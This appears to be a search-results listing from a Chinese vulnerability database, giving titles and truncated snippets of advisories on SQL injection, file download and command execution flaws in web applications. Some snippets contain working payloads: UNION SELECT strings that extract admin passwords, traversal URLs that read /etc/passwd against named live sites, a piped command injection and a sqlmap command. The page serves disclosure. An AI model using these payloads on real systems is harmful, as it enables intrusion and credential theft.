56796 matches found
OpenSSH client Information Leak & Buffer Overflow
Since version 5.4 released on March 8, 2010, the OpenSSH client supports an undocumented feature called roaming: if the connection to an SSH server breaks unexpectedly, and if the server supports roaming as well, the client is able to reconnect to the server and resume the suspended SSH session...
RuvarOA协同办公软件 get_condiction.aspx SQL注入漏洞
No description provided by source...
Apache Axis2 后台默认口令
No description provided by source...
Fanwe O2O商业系统index.php处的POST参数topic_id存在SQL注入漏洞
No description provided by source...
StrongSoft灾害预警系统InfoDetail.aspx ADCD参数SQL注入漏洞
No description provided by source...
RuvarOA协同办公软件Include/get_dict.ashx bt_id参数SQL注入漏洞
No description provided by source...
Shop7z show_all.asp SQL注入漏洞
/showall.asp?cid=7685%20%20UNION%20SELECT%201%2C2%2C3%2C%27%21%21%21%27%2bsuser%2b%27%21%21%21%27%2C%27@%27%2bspwd%2b%27@%27%2C6%2C7%2C8%2C9%2C10%2C11%20from%20admin...
Shop7z /show.asp pkid参数SQL注入漏洞
exp:show.asp?pkid=4820%20and%201%20=%202%20union%20select%201,2,3,4,5,6,7,suser,9,10,11,12,13,14,15,16,spwd,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42%20from%20Shop7zAdmin...
Simple Ads Manager 2.9.4.116 - SQL Injection
No description provided by source...
Shop7z show_foot.asp, showone.asp等文件SQL注入漏洞
问题参数:cid TEST:http://www.125309.com/showfoot.asp?cid=1 code 区域 Place: GET Parameter: cid Type: boolean-based blind Title: Microsoft Access boolean-based blind - Parameter replace original va lue Payload: cid=IIF3932=3932,1,1/0 Type: UNION query Title: Generic UNION query NULL - 11 columns Payload...
eyou反垃圾邮件网关系统在/php/admin_login.php处存在SQL注入漏洞
No description provided by source...
益用TMS在线培训系统mood/xinqing.aspx id参数SQL注入漏洞
No description provided by source...
Ruby colorscore gem任意代码执行漏洞
No description provided by source...
strongSwan远程代码执行漏洞
No description provided by source...
Emlog 5.3.1 flash xss
No description provided by source...
Android Bluetooth权限提升漏洞
No description provided by source...
Ubuntu Vivid本地提权漏洞
No description provided by source...
SiteFactory CMS的/manage/download.aspx处参数File存在任意文件下载漏洞
No description provided by source...
weaver 0A系统在com.eweaver.base.DataAction处存在任意SQL命令执行漏洞
No description provided by source...
金蝶友商在线客服存在任意文件下载漏洞
简要描述: 详细说明: 打开链接:http://im.youshang.com/live800/downlog.jsp?path=/&fileName=/etc/passwd 可以下载passwd文件,内容如下: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync...
phpyunV4.0 /app/public/action.class.php SQL注入漏洞
No description provided by source...
GlassFish 任意文件读取漏洞
java把"%c0%ae"解析为"\uC0AE",最后转义为ASCCII字符"." 访问如下链接即可看到效果: http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd 参考链接: 《漏洞预警:应用服务器glassfish任意文件读取漏洞》 !/usr/bin/env python coding...
Pitivi任意命令执行漏洞
No description provided by source...
Csdjcms在在app/controllers/open.php处存在SQL注入漏洞
No description provided by source...
Cacti 0.8.8f graphs_new.php SQL注入漏洞
关键代码如下 function formsave if isset$POST"savecomponentgraph" / summarize the 'create graph from host template/snmp index' stuff into an array / while list$var, $val = each$POST if pregmatch'/^cg\d+$/', $var, $matches $selectedgraphs"cg"$matches1$matches1 = true; //cgg is not filtered elseif...
RuvarRHM select_baseinfo.aspx bt_name参数SQL注入漏洞
0x01 框架介绍 uvarHRM人力资源管理系统,汇集了众多成功企业先进的人力资源管理理念、人力资源管理实践、人力资源信息化系统建设的宝贵经验,以先进的信息技术,实现对企业人力资源信息的高度集成化管理,是适合中国企业使用的人力资源管理解决方案,为现代企业的成长与发展提供了先进、科学、务实的人力资源管理模式。 RuvarHRM采用基于IE浏览器的 B/S 结构,以人员管理、考勤管理、薪资管理、招聘管理、培训管理、合同管理、社保福利、绩效考核、报表中心为核心功能模块,是企业领导、HR经理和员工全员参与的,可多层次管理的集团版eHR系统。 官方主页:http://www.ruvar.com/...
shop7z Advsearchadmin.asp kindnum参数SQL注入漏洞
code 区域 Advsearchadmin.asp kindnum=trimrequest"kindnum" pipai=trimrequest"pipai" model=trimrequest"model" productname=trimrequest"productname" price11=trimrequest"price11" price12=trimrequest"price12" price21=trimrequest"price21" price22=trimrequest"price22" if price11="" then price11="0" if...
JCMS政务系统在/lm/front/mailwrite_over.jsp页面存在任意文件遍历漏洞
No description provided by source...
用友ERP-NC系统/NCFindWeb接口任意文件下载
该漏洞权限比较大,可以获取数据库,/etc/passwd等信息,漏洞存在链接: http://vul/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml 可以读取到数据库密码,如图: 也可以读取/etc/passwd,如图: 中粮集团,民生电商等大量企业受到影响...
Android Trustzone 权限提升漏洞
No description provided by source...
QEMU rocker.c 栈缓冲区溢出漏洞
No description provided by source...
EduWind在线教育建站系统 /cms/article/index/cid/ SQL注入漏洞
No description provided by source...
Shop7z admin/lipinadd.asp越权访问
No description provided by source...
Shop7z /show.asp pkid参数SQL注入漏洞
漏洞出现在show.asp 358行开始 dim pkid,model,productname,smallpicpath,price1,price2,pipai pkid=request"pkid" sql="select from viewproduct where pkid = "&pkid set rs=server.createobject"adodb.recordset" rs.open sql,conn,1,1 if rs.bof or rs.eof then pkid直接通过request获取 并拼接到sql语句中 没有任何过滤 poc:...
Shop7z /show_foot.asp c_id参数SQL注入漏洞
No description provided by source...
workyi人才系统2.5版本/news/search.aspx 参数key存在SQL注入漏洞
0x01 框架介绍 工作易人才招聘系统是由华兴科技网络开发的一套高端人才系统,并通过了国家计算机版权认证中心的认可。由.NET+ MSSQL编写,网站模板采用DIV+CSS构成,兼容IE6/IE7/IE8、火狐等主流内核浏览器,当然也兼容IE内核的傲游、世界之窗、腾讯TT等浏览器。 该网站主要由企业招聘、万能采集、手机版、木马检测、一句求贤、最新求职、人才评测、视频简历、院校联盟、个人服务、企业服务、资讯中心几大部分组成。工作易人才招聘系统是面向中小企业和个人站长建站时,最具性价比的一套人才招聘系统。以《实用、稳定、低价》的特色占据市场的一席之地。采用微软的.Net最新技术开发。...
AnyMacro邮件投递网关系统/login.php处存在SQL注入漏洞
No description provided by source...
泛微协同商务系统e-cology某处SQL注入(附验证中转脚本)
简要描述: RT 详细说明: 官网http://...//services/ 随便找个吧 以http://...//services/MobileService?wsdl为例 使用wvs checkUserLogin方法 三个参数 分别为字符型、字符型和数字 正确的时候返回3 错误返回4 (本想采用抓包工具(WSockExpert ) 使用某度搜索了一个 评分还挺高 结果系统多了个某度影音 和某度输...
shopNC B2B版 /microshop/index.php处存在SQL注入漏洞
No description provided by source...
天融信 Top-App 应用网关 enable_tool_debug.php 命令执行漏洞
No description provided by source...
天融信Topsec系统 getMacAddr.php 命令执行
getMacAddr.php: code 区域 '; ? 跟进getMacAddrFromIfName code 区域 function getMacAddrFromIfName$ifName $mac = execute'cat /sys/class/net/' . trim$ifName . '/address'-get'output'; if$mac != null && $mac != '' return $mac0; else return ''; http://218.206.217.19:8080/acc/network/getMacAddr.php?eth= | echo...
Joomla 组件Gallery WD SQL注入漏洞
0x01 漏洞简介 Joomla 组件Gallery WD存在多处SQL注入漏洞。远程攻击者可以利用该漏洞执行任意SQL指令。该插件的下载地址是: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd 0x02漏洞说明 2.1参数themeid存在GET型SQL注入漏洞 该漏洞利用的POC格式如下: index.php?option=comgallerywd&view=gallerybox&imageid=19&galleryid=2&themeid=1 AND...
shop7z 商城系统在/Advsearchadmin.asp 处参数kindnum存在SQL注入漏洞
0x01漏洞简介 shop7z商城系统在Advsearchadmin.asp 处的参数kindnum由于过滤不严,存在kindnumSQL注入漏洞。远程攻击者可以利用该漏洞执行任意SQL指令。 0x02漏洞分析 Advsearchadmin.asp代码如下: kindnum=trimrequest"kindnum" pipai=trimrequest"pipai" model=trimrequest"model" productname=trimrequest"productname" price11=trimrequest"price11"...
Discuz问卷调查专业版插件参数orderby存在SQL注入漏洞
No description provided by source...
AppCMS v1.3 在index.php存在信息泄漏漏洞
No description provided by source...
HiShop网上商店系统多版本SQL注入
简要描述: HiShop全称“长沙海商网络技术有限公司”,是国内最大的ASP.NET独立网店服务提供商。长期专注于B2C网上购物软件的研发及相关增值服务的提供。拥有著名网上商店系统品牌——HiShop。公司的主要业务是为中小企业、个人网商及网站站长提供B2C独立购物网站搭建的一站式套餐服务及网店推广、货源提供、个性定制等相关增值服务。 详细说明: 之前提交给wooyun,一直没反应! 主要是Hishop6.0-Hishop6.1版本存在此处注入,不是开源的,黑盒来吧 关键字: powered by Hishop6.0 powered by Hishop6.1 用量不小,百度搜索看下...
方维订餐系统 tuan.php code参数SQL注入漏洞
No description provided by source...
V5shop 在cart.aspx处的参数spikeid存在SQL注入漏洞
举例: 通过谷歌搜索inurl:productpic.aspx,因为cart.aspx是需要登录才可以正常访问,但是注入的时候毫无影响。 案例: http://www.wolifu.com/cart.aspx?act=spikebuy&spikeid=3 D:\sqlmappython sqlmap.py -u "http://www.wolifu.com/cart.aspx?act=spikebuy&spik eid=3" -p "spikeid" | | 1.0-dev-nongit-20150806 | -| . | | | .'| . | || |||||,| | || ||...
HearOA在/bnuoa/vfs处存在本地文件包含漏洞
No description provided by source...
Netentsec ASG网康应用安全网关在commonpluginDownload.php存在任意文件下载漏洞
0x01漏洞简介 Netentsec ASG网康应用安全网关在/commonplugin/Download.php存在任意文件下载漏洞。远程攻击者可以利用参数licensefile 或者 reqfile 结合..下载任意文件。如果下载文件是SvrLicense.license表示该漏洞已经修复,如果下载文件为自己包含的文件,说明该漏洞仍然存在。 0x02漏洞分析 查看问题代码如下: obstart""; header"Expires: Sat, 01 Jan 2000 00:00:00 GMT"; header"Last-Modified: ".gmdate"D, d M Y...